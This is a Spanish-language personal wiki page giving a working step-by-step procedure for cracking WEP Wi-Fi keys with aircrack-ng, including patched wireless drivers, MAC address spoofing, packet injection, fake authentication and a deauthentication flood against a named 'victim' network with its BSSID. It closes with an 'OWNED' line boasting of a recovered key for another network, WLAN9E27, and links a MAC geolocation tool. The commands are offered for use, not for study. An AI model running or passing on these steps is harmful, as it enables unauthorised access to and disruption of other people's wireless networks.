Descifrar claves WEP

De 33system wiki
Saltar a: navegación, buscar

<< Informatica

Script para R8187

(drivers y cambiar channel)

wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
Cambiar de mac
# tiramos el interfaz
ifconfig eth0 down
# cambiamos la mac
ifconfig eth0 hw ether xx:xx:xx:xx:xx:xx
# levantamos el interfaz
ifconfig eth0 up


Procedimiento

1.- Poner adaptador en modo Monitoreo de Red

airmon-ng start wlan2

2.- Seleccionar a la victima y su MacAddress

airodump-ng mon0

3.- Poner adaptador en canal de la señal y guardar los paquetes

airodump-ng mon0 --ivs -w INFINITUM311a -c6

4.- Ahora se tiene que abrir una nueva terminal como root para Incrementar paquetes

aireplay-ng mon0 -3 -e INFINITUM311a -b 00:25:68:06:FB:A8

5.- Empezar ataque, abrir otra terminal como root y asociarnos.

aireplay-ng mon0 -1 0 -e INFINITUM311a -a 00:25:68:06:FB:A8

6.- Yo siempre hago un broadcast por 1 minuto para fortalecer la conexión después de eso lo paro.

aireplay-ng mon0 -0 0 -e INFINITUM311a -a 00:25:68:06:FB:A8 *Ojo cambió el -1

Hasta aquí notaremos que la linea Read 3707 packets (got 0 ARP requests and 4 ACKs), sent 0 packets...(0 pps) ha cambiado a Read 68707 packets (got 0 ARP requests and 746 ACKs), sent 0 packets...(500 pps) esto pasa por el incremento de intercambio de paquetes, si ya han llegado hasta aquí y ya han pasado varios minutos y notan que los ACKs no suben es mejor que comiencen el proceso de nuevo, si todo va sobre ruedas entonces es hora de abrir aircrack-ng.

7.- Desencriptar la clave.

aircrack-ng INFINITUM311a*.ivs

Documentacion

http://www.aircrack.es/foro/aircrack-ng-linux/65-tutorial-claves-wep-aircrack-cero.html

Geolocalizacion de puntos de accesos

Geolocalizacion por direccion mac http://samy.pl/mapxss/

OWNED

WLAN9E27 =====> KEY FOUND! [ 41:32:41:32:36:36:43:34:32:33:45:43:39 ] (ASCII: A2A266C423EC9 ) Decrypted correctly: 100% [BANG !!]